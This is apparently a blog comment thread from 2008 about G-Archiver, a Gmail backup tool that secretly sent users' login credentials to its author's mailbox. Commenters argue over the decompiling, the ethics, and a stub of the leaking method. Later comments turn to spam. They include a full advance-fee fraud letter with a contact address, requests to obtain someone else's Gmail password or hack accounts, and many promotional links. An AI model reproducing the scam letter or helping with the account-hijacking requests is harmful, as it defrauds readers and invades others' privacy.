Absolutely defensible, yes.

If your own ethics stop you from building better "killing machines", then could it also be unethical to NOT build better "saving machines".

The ethical line is so grey it is impossible to dictate to anyone what they should consider right / wrong. In fact, even telling someone what is right and wrong could be considered unethical.

I think this post has nothing to do with ethics, it is purely awareness of what could be out there. Unfortunately, the majority of readers of this blog would already know this, hence the number of "idiot" responses. It's your average user that needs to be aware.

Thankfully as the number of emails and websites that ask for usernames and passwords is so high, most people are already aware that anything that asks for personal data could be malicious.

What are the chances Russ got this written by some South Asian dude from Rent-A-Coder?

Despite the emails being deleted, I wouldn't worry about total loss of data. We are talking GMail...from Google. The data is available just not accessible.

I think computer systems and online accounts are almost fully transparent to intelligence services and criminals alike.

For products based on good security principles, you have to resort to Israelian based companies like Aladdin, because of the Wassenaar treaty.

Why do I get the feeling they deliberately created a backdoor in those products?

Maarten

Some people say that Dustin went too far. I say he didn't go far enough.

If *I* had gained access to the account, I would have harvested the GMail usernames (but not passwords) and sent a note to all those users informing them of the security breach.

I think that would be even *more* ethical.

Grats, you got into news:
http://www.itviikko.fi/page.php?page_id=46&news_id=20087271

Nice Work,

Greetz Me

Dang, these people suck. Can we ever invent a technology that prevents people from using data in unacceptable ways?

Slashdotted: http://it.slashdot.org/it/08/03/11/1723206.shtml

Holy ****, that is scary :|

Talking about ethics. If anybody here claims to have ethics and cites the lack of conformance to the ACM as unethical I would say you are a person without a good set of ethics. I take no issue with the person manipulating others over the web when everybody should know better than to unquestionably trust what they hear, read, see, or download on the web-or even in real life. If you are going to adopt a set of worthy ethics in regards to software you should be adopting something closer to Richard Stallman's four freedoms:

First, Freedom Zero is the freedom to run the program for any purpose, any way you like.

Freedom One is the freedom to help yourself by changing the program
to suit your needs.

Freedom Two is the freedom to help your neighbor by distributing copies of the program.

And Freedom Three is the freedom to help build your community by publishing an improved version so others can get the benefit of your work.

The ACM is a load of cr*p. It is one set of ethics that nobody should conform to. If you can't find an ethical business model with free software you should pick another career path. By agreeing with the ACM you are supporting software patents and that is unethical in my book. Free does not mean you can't make money on software. If you can't grasp the concept you shouldn't judge. On the other hand I see little wrong with doing as you please on the Internet when it is by its very existence lawless. Even the one supposedly universal law that every nation has (no one shall commit treason) doesn't work on the net. Wake up, smell the real world, and take reasonable precautions instead of trying to punish those smarter than you- except in reality the law only destroys a small minority of lives of people probably similar to oneself (if you think you have ethics anyway) since these laws are for all practical purposes generally unenforceable on the majority or violate them.

http://www.sophos.com/security/blog/2008/03/1155.html

"5. Honor property rights including copyrights and patent."

I hope the ACM guys read all the software patents pending and granted by the USPTO and other patent offices.

Poor ACMs.

Just for kicks I wanted to see if the PW was changed back or not, and noticed the password hint (as updated by Dustin)

"Why shouldn't I hard code my username and password into my software that sends me everyones personal information??"

LOL

Bubble and squeak...you will be assimilated.

Greatest fear? On the contrary, isn't that to be expected?

I mean, if you give away your credentials .. you've... given them away..?

I am totally serious here. If I give away my password, I expect the recipient to store it. So if I want it to stay secret I change it. Don't you?

What a douche. He wasnt a very smart douche either.

Is it possible that Mr. Terry missed the ACM Code of Ethics Section in his curriculum?

Few things I need to make clear:

- I'm not in any way affiliated with G-Archiver.
- I don't know 'John Terry'
- Indeed jterry79@gmail.com emailed me in the past with some questions regarding my component.
- Later his company stole and used my software.

You can find my comments here:
http://www.lesnikowski.com/GArchiver/

This sort of thing belies a much greater occurrence -- this is happening all the time, with any number of schemes. I've found one op. where you buy something via PayPal, and then need a password to access the goods -- so what the site will do is use your PayPal addy, and then use the password you used for the site...to fleece you dry and do dastardly things.

In yet another scam, in this case "Replica Outlet" or "Replica-Faux" (which is now hosted in an offshore colo...surprise!) -- what they do is run the business for three months, then right before they close up, they will charge the maximum amount they can on your credit card you used to purchase something from them -- an unauthorized charge...

The, surprise surprise, they go out of business, only to re-surface again and again. They used to be in Portland, Oregon, then they moved to Austria...and now they're hosted by a Hong Kong colo...

What really, really sucks in some cases is if you use a "Check" or Debit VISA card -- it's taken right out of your account, and they don't have to move as quickly to recompense this fraud.

Beware. These #$%*@ pissed off the wrong guy, and I am actively hunting them. They literally took food off our table...it took months to work out...beware.

Backups. Aren't there backups? Gmail has to have backups. Deleting this stuff is like picking lint off your dog. It can magically reappear in no time.

One time I was at a job posting site (a medium sized one, not monster), and I suddenly was given the session of someone else. I made a small notation in his resume, then emailed him and the site about what happened. He wasn't too happy, I don't recall the site did anything. The funny thing was the guy worked for one of the companies looking for someone like me (but only slightly geographically undesireable) - small world.

haha, thats the most stupid backdoor i have ever seen.. xD

tbh, the creator of the program is not smart enough to code his backdoor in a .NET assembly, and he didn't even obfuscate it.. haha..

Why is the variable name still there after the code got compiled? Or Was Brian being nice and translated the instruction into a more readable code?

This was a disturbing tale. It prompted me to write a post about how to archive your Gmail for free:
http://www.mattcutts.com/blog/backup-gmail-in-linux-with-getmail/

Another thing I don't understand assuming the statement G-Archiver made was correct was that I thought a function like checkconnection is supposed to check connection and return the result wheter the connection is good or bad or get some error code back. Why is it a void function???

Hi,

Was Googling my name, and came across this post,

"This John Terry seems to email pawel lesnikowski and adityasonphavde (aditya rao) I would not trust these people either.
joe on March 7, 2008 03:51 PM "

What have I done, and what is my name doing on codinghorror?

:-) Would like to know more....

@alex - @Joshua & others, the screenshot only shows that the most recent 1777 emails were unread - who knows how many thousands of people have tried the software. Plus, if they are being automatically forwarded they won't show up as read. I'm not sure that what Dustin did was right, but if he had to do it, he could have at least checked out the filters and saved the contact list first.

Not only that, the screenshot shows the username and password (albeit blacked out) are in subject and the mail wouldn't even need to be read to glean the password.

Whether what Dustin did was right is a bit of a tricky on. I don't think he should have left it as it is. Changing the password was definitely the right thing, otherwise, as is changing anything which could allow J Terry to regain access of the mailbox. Deleting the emails, without first making a list of the accounts could make any investigations a little more difficult - however if J Terry had been using the accounts details maliciously for personal gain, I suspect that there would be many other ways to identify that.

BTW, I can't see any possible debugging purpose for sending any passwords (let alone somebody elses) via email. Email is a 99.9% insecure protocol, and most people tend to avoid sending passwords via email. Whilst I would like to give J Terry the benefit of the doubt, I can't see any possible too. Even if he didn't do this intentionally, there is no guarantee that Dustin Brooks is the first person to find this flaw, and the list of passwords.

All in all, I think this is a great reminder for us all to be careful with our passwords and all that goes with that (e.g. not using the same one everywhere, changing them often etc.).

can't believe this site is endorsing and making apology to reverse-engineering and decompiling.

This site should be taken down immediately. Think of the children!

I have to say, that I am sure the guy who wrote the software might have alreadty used his own software to back up this account and all the usernames & passwords, so unless the whole list of 17,000 people were atleast sent an email explaining the situation and making everyone aware to change their passwords...that would be better, as well, we all now should know instead of using GArchiver, let's use Thunderbird...seems like the equiv of using firefox instead of IE...

Interesting that in a post supposedly about morals, I see such a huge display of lack of morals. The incitement to offline harrassment was particularly distasteful.

As for the original "offense", I'm inclined to use Hanlon's Razor. Most likely, this was just (utter and abject) stupidity on the author's part.

If he was maliciously stealing account info, there's no way he'd expose himself to the same activity by hardcoding his own info in publicly available source code. Crooks don't think that way. They think the world is full of crooks just like them. You'll never find a burgalar who leaves his own doors unlocked. On the opposite side you have honest but naieve people, who think that everyone is basicly trustworthy like them.

That's what this looks like. This is the work of someone who stupidly did not see the downside of making a person's account info publicly available. Even his own.

I could be wrong of course. But it seems the dude just isn't very smart. That makes a lot of the more extreme responses here seem like the moral equivalent of beating up on the retarded kid.

All right, listen up all you armshair ethicist, here's my take (as another armchair ethicist):

Reverse-engineering itself is *not* unethical. It's a process, a tool. In the same sense, fire is not unethical...but arson is. Making s'mores is not unethical, even though it uses the same process -- fire -- as arson. Reverse-engineering itself is not unethical -- using the output for one's own personal gain *is*. That's not what happenned here.

Reverse-engineering is often the only way to check the facts, which are necessary for informed decision-making.

So, I applaud the actions. I also understand, as some apparently do not, that because the purloined user info wasn't exported to the offender's own contact book, notifying the *thousands* of victims would have been a hideously long, MANUAL process...or if not manual, he'd need to craft a script to do it, which was still his time and labor. The action he chose was swift, practical, and mitigated the threat (as others have noted).

Just how much of his <sarc>infinite</sarc> personal time was he *supposed* to spend swatting this one buttnugget? I think expecting more than he already did -- which is already above-and-beyond! -- is unfair in the extreme.

There are of course, some means which are unethical no matter which way you slice them, because they deprive others of their fair share of life, liberty, and happiness. But that is outside the scope of this discussion, so any comments about warfighting and defense industry belong elsewhere. I'm not saying those matters shouldn't be discussed, just not discussed *here*.

It's also worth noting that hijacking threads for personal agendas is unethical ;) Or at least poor netiquette. Why is it, as in NY, that the most sanctimonious are often the worst offenders?

<a href="http://www.garchiversupport.com/ticket.php?track=YYMYRE5BZZ">http://www.garchiversupport.com/ticket.php?track=YYMYRE5BZZ</a>

No doubt this is quite shocking but I would like to give the coder the benefit of doubt until we don't find a substantiative evidence that he misused or even used this information at all.

The benefit of the doubt!?! He stole username and passwords of people who used the program!!! It IS a crime already. What more do you need?

A story

I'm peeking through my binoculars at your hot wife stepping out of the shower. Then I notice an intruder climbing in through the window, with a knife, hiding outside the bathroom door.

Obviously, my initial actions were unethical. Question them all you want. With that said, what do you want me to do next?

1) Watch to see what happens? Probably not.
2) Run across the lawn, bang on the bathroom window and call the police? Ya.
3) Just alert the authorities? No.

You'd probably opt for #2, because you want your wife safe, and closing the curtains next time. Regardless of the morality behind what I did to discover, you want me to act and prohibit imminent harm.

Chances are, if I broke the bathroom window and got your wife out, but she got cut... you'd be ok with that.

So Dustin deletes all the email. Would we rather he keep evidence? Notify the user? Take some other action? Sure. An auto-reply would have been nice. Deleting the account would have been a horrible idea -- because JTerry could have just recreated it...

Changing the password... wouldn't that keep the emails from being sent to begin with? So... keeping the password the same and setting up an auto-responder would've been ideal. Perhaps topped off by setting up a pop client to download/delete the emails... until authorities acted.

But the bottom line, is if you see bleeding -- stop the bleeding. Dustin did that. The best way possible? Maybe not. Questionable ethics on his part re: source code? Maybe - very debatable. But all in all, he did what most people would want him to do.

As for viewing the source code: here, I see no harm. It is software I installed on MY pc, I want to know that it is NOT malicious, because of cases just like this. As long as I do not seek to profit from it, but take the action purely as a measure of self-protection, I think it's ok.

blah.

@Yann
>>Encrypting the data means you have a key somewhere. Writing your own
>>cryptographic algorithm means it's broken (see Schneier) and anyway,
>>all that's needed to break your clever
>>encrypted-password-in-executable scheme is to set up a software
>>http/https proxy (fiddler, wireshark, etc.) and read the plain text
>>credentials passed by the program.

BTW, https is "end-to-end" security. So only your browser and the final server (whose certificate the browser uses) can decrypt the information. A http/https proxy CANNOT see anything sent, e.g. form fields containing usernames, passwords.

to those who are accusing duncan of violating the dmca, remember there are carve-outs in the dmca for security research. there's an argument that could be made there.

"That´s really bad, and the problem is that only people like us (who knows what reflector is) realize of that kind of things and very often the law is short to punish this kinds of crimes.

Good Job Jeff! if you stop programming try to be a detective or a tv series writer.

I really enjoy your blog, thanks! "

lol @ reflector, you know not all apps are written in .NET, in fact .NET is a Microsoft framework and proprietary compiler so it makes you wonder what the hell was this Dustin Guy poking around in other ppls proprietary src code for, just curiosity or perhaps with malicious ideas of his own....

learn byte code if you want to be hardcore

I must be stupid, but I just don't see why you need a tool for backing up GMAIL! You can access it via IMAP (prefered) or POP3 from any email client. I use Thunderbird. What could be simpler??

Two observations

1. No-One is apparently monitoring / moderating these posts

2. The Post by " Brian on March 10, 2008 06:07 AM " gives any
malicious coder a template to add this illegal scripting into
any program they want to make and have distributed on the Internet.
I'm sure Brian's ego got a good massage by showing everyone he
knows how to use a utility like " reflector " to look at the
source code in the executable of the offending software.

3. It is a catch 22 situation. you want on one hand to show people
what utilities to use , and what type of code is malicious ,
especially when dealing with any user-name and password leaching
code. But on the other hand it's a matter of giving away the
Golden Key.

4. As pointed out by " Revi on March 12, 2008 09:00 PM "

BTW, https is "end-to-end" security. So only your browser and the final server (whose certificate the browser uses) can decrypt the information. A http/https proxy CANNOT see anything sent, e.g. form fields containing usernames, passwords.
**********************************************************
If you are using an e-mail / web based online or installed on your
computer service or utility, it should always be https based
( Like Bluebottle.com or similar ).

5. As pointed out by Mike on March 12, 2008 05:36 PM
So Dustin deletes all the email. Would we rather he keep evidence? Notify the user? Take some other action? Sure. An auto-reply would have been nice. Deleting the account would have been a horrible idea -- because JTerry could have just recreated it...

Changing the password... wouldn't that keep the emails from being sent to begin with? So... keeping the password the same and setting up an auto-responder would've been ideal. Perhaps topped off by setting up a pop client to download/delete the emails... until authorities acted.

But the bottom line, is if you see bleeding -- stop the bleeding. Dustin did that. The best way possible? Maybe not. Questionable ethics on his part re: source code? Maybe - very debatable. But all in all, he did what most people would want him to do.

As for viewing the source code: here, I see no harm. It is software I installed on MY pc, I want to know that it is NOT malicious, because of cases just like this. As long as I do not seek to profit from it, but take the action purely as a measure of self-protection, I think it's ok.

6. So, Windows users, you might want to start getting the source and compiling stuff yourself rather than using binary executables.
Volo Mike on March 9, 2008 08:58 PM

7. Go Study @ http://www.schneier.com

8. Now that username /password stealing viruses / rootkits
written in UNIX have been found on I-PODS manufactured in China
I am also suspect of all internal / USB External and Flash Drives
manufactured in China going back 4 yrs.

If you noticed, none of the emails, had ever been opened. if jterry planned exploiting, he probably would have checked his inbox, before 1700 messages :P. No doubt it was just something overlooked, when the software was still in testing stages.

"Overlooked"

Being that someone at random logged into the account, anybody else at random could have too, so John (Or whatever) didn't have to be the one to want to exploit anything, someone else could have, and in fact, if they had gotten there before the emails were deleted and changed the password they would have access to 1,700 Google accounts.

Too bad programmers like that exist to decrease my salary around the world.

I was similarly shocked when I read about the Blog Readability Badge scam - http://www.labnol.org/internet/favorites/blog-readability-test-online-scam/1910/

Although not as serious as the scam mentioned here, we need to be careful before sticking in Javascript of widgets and badges offered by third party sites.

@Geri

Unfortunately, you have fallen foul of the straw man fallacy. I understand the point you are trying to make (although your tone could be improved), but the fundamental difference is a matter of privacy.

If you voluntarily distribute a piece of software, any notion of privacy as regards its inner workings is artificial. Your comparison would only be reasonable if I had said that users were entitled to acquire a piece of software without the owner's permission.

Dang, you're all so freaking paranoid! Still, I suppose it's better to have cleared out this Gmail account rather than keep all those u/p combos available...

Very nice flimsy excuse on their part, who would ever trust them again?

Flash back to a little less than 12 months ago. In Iowa, the leader board featured a former Mayor of New York, a former Governor of Massachusetts, and the DA from Law & Order. In New Hampshire, the outlook was similar: Mitt Romney was at the front of the pack, followed distantly by Rudy Giuliani.
[url=http://www.topsitesranking.info ]link ekle[/url]
[url=http://www.ipcaresbi.com ]link ekle[/url]

hi

fdfd

It's a pleasant surprise to find a sanctury from all that modern inane garbage they call music.

WOW I WOULD NEVER BELIEVE N E ONE I WOULD NO WOULD DO THAT TO ME BUT I GUESS U CANT TRUST N E ONE....

I think that this is a really neat place even though I am trying to find some pages for my reasearch paper for art.

czxczx

Very nice flimsy excuse on their part, who would ever trust them again?

This is way late of course, but anyone suggesting this was anything but an attempt to steal passwords is just kidding themselves... consider the code

public static void CheckConnection(string a, string b) {
....try {
........//sending the password...
....} catch (Exception) {
........//Nothing here?
....}
....//rest of the code

It has no return type and doesn't throw and exception - what "checking" can it possibly do if it is functionally equivilent to an empty method.

Besides - if he is "checking a connection", he doesn't need to send any information, his password is more than enough to verify the site can be accessed.

I think that this is a really neat place even though I am trying to find some pages for my reasearch paper for art.

Dearest One!!

With due respect, trust and humanity, I write this
letter to you seeking your help and assistance, though
it is difficult since we have not met before. In
Abidjan regarding your business profile and sincerity,
I beleive that you are capable and reliable in
handling this urgent international transaction of this
sorft.

AT (miss.sandra_boga@yahoo.fr)
I am Mis Sandra Boga, The daugther of Professor Emile
Boga Doudou, Former interior minister and a great
politician in cote d' ivoire political arena. Because
of my father's sincerity, He was killed on the 19th of
september 2006 by unknown soldiers inhisresidential
house during the coup plot in cote d' ivoire. See BBC
news for more information about my late father's
death.

(http://news.bbc.co.uk/1/hi/world/africa/2268718.stm)

Before his death he disclose to me about the
diplomatic money he deposited in a [security company]
containing us$9..3million (Nine million Three hundred
thousand dollars) and my name was the next of kin
and the original document of deposit is intact. The
fear of money not raising eye brows here in cote d'
ivoire I decided to contact you seeking for your help
to claim the right ownership of the consignment and to
open a new bank account for this money to be transfer
to as all arrangements for a hitch free transfer have
been fully taken care of,

I want to assure you that this transaction.is 100 %
risk free as no other person knows this box apart from
me and you. dear, as for your reward and kind
assistance I have resolve to give you 15% of the total
amount and 5% for any expenses that might be incured
in the course of this transaction.

I planned to invest the rest of the money in your
country under your guidiance. If you are willing to
help me try as much as possible to reach me through
the email to enable us proceed in earnest towards
concluding all transaction. dear, bear in mind that my
life depend on this fund and I do hope that this money
will be safe when finally transfer into your new
account. I do hope of establishing a rewarding and
good relationship with you and your family after this
transaction hoping to hear from you as soon as
possible.

I am 23 years old, single and Also a christain but I
was meant to know that a woman has no religion untill
she is under a man or family therefore I promised to
abide to any religion that you and your family are
into.

Thanks for your co-operation and God bless.

Best regard

Miss Sandra Boga

I think that this is a really neat place.

I suppose the classic examples of unethical programming are the guys from EDS who wrote the software for SAVAK the Shah of Iran's secret polcie in the 1970s.

thanks

The article speaks of a piecing together a new financial plan.

I have nothing to say about your blogs it is nice blogs thank you. <a href="http://alaminos.net">kabonfootprint</a>

Why didn't he send all the credentials to a different e-mail? I'm glad he didn't, but that was kind of stupid.

qsw18d
gtg09y
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
&#27893;
&#27700;&#27893;
&#29615;&#20445;&#35774;&#22791;
&#27893;
&#27893;
&#27893;
&#27700;&#27893;
&#27700;&#27893;
&#27700;&#27893;
&#27700;&#27893;
&#40831;&#36718;&#36755;&#27833;&#27893;
&#40831;&#36718;&#36755;&#27833;&#27893;
&#29615;&#20445;&#35774;&#22791;
&#21270;&#24037;&#27893;
&#21270;&#24037;&#27893;
China Travel
China Tours
China Tours
beijing Tours
beijing Tours
beijing Travel
beijing Travel
shanghai Tours
shanghai Tours
shanghai Travel
shanghai Travel
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
wow gold
&#27893;
&#27700;&#27893;
&#40831;&#36718;&#36755;&#27833;&#27893;
&#29615;&#20445;&#35774;&#22791;

its incredible! we forget rule - Trust but verify!

m_mohamed_1996@hotmail.com

At the risk of pointing out the obvious, if you type your user name and password into some shareware program that you've downloaded, then you're always leaving yourself wide open to this kind of abuse.
---------------
shivani

Hi, I need the gmail password of one of my friends to investigate something. Can you somehow help. I am in urgent need of help.

Regardless what other people says..., I do in love with your site, just go for it dude..., there's always a whiner along the road...

:).

Love it..., just write more...

I wish only malicious programmer was him. Maybe, he just wanted to read someones mail, not with intention to stole bank accounts etc. we don't know.
There are many of them out somewhere. We use too many programs in our PC's, do we have to do reverse engineering to all them to be able to use all them safely.
No, whatever we do, there will be yet some mysteriour thingd behind the screen.
We have an idiom;
Education is must.
But not in just school, in the family, shou&#351;d start as soon as we born.

hey dude its not right to de-compile that code in the first place, just like Israel Orange did, you should have privately emailed John Terry. Not only did you go into his account where all the email accounts were stored but you deleted all the emails but you changed his password and secret question as well!
Your telling us about ethics? Look what you did...
Naughty naughty.

Then again Terry was up to something... fishy fish.

vdsf

cool blog,thank you!!

camfrog
password ?

hi this is ram

hi this is an internet marketing company

I think that this is a really neat place even though I am trying to find some pages for my reasearch paper for art.
http://autoprestizh.ru/

Once again the post is great.
Thanks much.
http://slsecurity.blogspot.com

I'm not an expert of the field.
But hopes I can help others.
http://winguard.blogspot.com

Please I want the steps to hack a yahoo and gmail account plz send it to rsundar1992@gmail.com

No one can easily hack gmail or yahoo mails.
But found some hack here.
http://crackzsl.blogspot.com/ : Cyber Realm Srilanka

Regardless what other people says..., I do in love with your site, just go for it dude..., there's always a whiner along the road...

-------------------------
http://www.boatrental-hk.com/

Much has been discussed about Identity Theft, user ID's and Passwords stolen or hacked, credit cards being used without the owners knowledge and so on. Now there is a safe way of protecting your passwords and identity online from being copied, stolen and hacked by keyboard trojans, using your biometric fingerprint and face recognition, and even voice, to log on to web sites. By simply scanning your finger or face or voice you can log on to a web site, log on to your computer, and even encrypt files and folders. No more worrying about who might hack into your online accounts or even your email. No more remembering passwords or using the same passwords on many sites. This is an exciting new innovation from myBiodentity and they have about fourteen products that are enabled with biometrics including email encryption, password manager, virtual disk, and many more. You can read more at About Identity Theft and stolen passwords, recently I came across a site that uses Biometrics of finger, face and voice verification so the user just scans to log on. You can read more at http://www.mybiodentity.com

Hey! Thanks for the invitation so much. I will try to come back as soon as possible. ;).
I am from Nicaragua and know bad English, tell me right I wrote the following sentence: "Cheap airline tickets to croatia, flights to zagreb."

With best wishes :), Dotty.

I do`not understand English!
&#21271;&#20140;&#24041;&#20041;&#26126;&#24314;&#31185;&#25216;&#26377;&#38480;&#20844;&#21496;&#20379;:&#34917;&#20607;&#22120;,&#20280;&#32553;&#22120;,&#26333;&#27668;&#36719;&#31649;,&#27233;&#33014;&#25509;&#22836;,&#38400;&#38376;,&#30707;&#33521;&#30722;,&#27963;&#24615;&#28845;,&#27963;&#24615;&#27687;&#21270;&#38109;,&#32858;&#21512;&#27695;&#21270;&#38109;,&#32858;&#19993;&#28911;&#37232;&#33018;,&#29983;&#29289;&#29699;&#22635;&#26009;&#31561;&#20135;&#21697;.

Well that is just crazy. Good thing the information landed in a decent persons lap. Could you imagine what could have happened if the info was in the wrong type of persons hands. And I could also imagine most of the passowrds used would have been the same passwords for personal documents aswell...tis a shame things like this happen. But nice to also see there are decent people in the World still :)

Also, why is there so much useless comments on here trying to use the HTML, it clearly says dont use it!

<a href="http://something4free.net/free-xbox-360/how-to-get-a-free-xbox-360/">http://something4free.net/free-xbox-360/how-to-get-a-free-xbox-360/</a>
<a href="http://something4free.net/">http://something4free.net/</a>

hey dude its not right to de-compile that code in the first place, just like Israel Orange did, you should have privately emailed John Terry. Not only did you go into his account where all the email accounts were stored but you deleted all the emails but you changed his password and secret question as well!
http://armoradix.ru

This really a good site for Programming. I have lot of info in this site. Thanks For Sharing

This really a good site. I have lot of info in this site. and we have a boiler installation company at UK London.
The site URL is
http://www.boilerinstallationslondon.co.uk

Good work. Keep going. YOu can check this software download site and submit your software PAD file

http://www.downloadpapa.com

Well...I suppose the classic examples of unethical programming are the guys from EDS who wrote the software for SAVAK the Shah of Iran's secret polcie in the 1970s.

Nice post thanks.

have to look into it

thanxx post. have to

wow, thankfully the user of the software was smart enough to delete everyone's username and password. It's amazing what goes on behind the scenes.

Hi, I need the gmail password of one of my friends to investigate something. Can you somehow help. I am in urgent need of help.

good work ;)

http://cumburlop.com
http://sinemaland.com

Thanks for this excellent article and control.
http://www.netvibes.com/abercrombieandfitchclothing

I had a similar problem, some of the comments above really helped!

Looks very interesting. Thanks for sharing..
http://coolday.blog.com/
http://www.mpos.net/s/p4.asp
http://fleafreesmart.com/

thanxxxx

Great informations, very useful.
Thank you.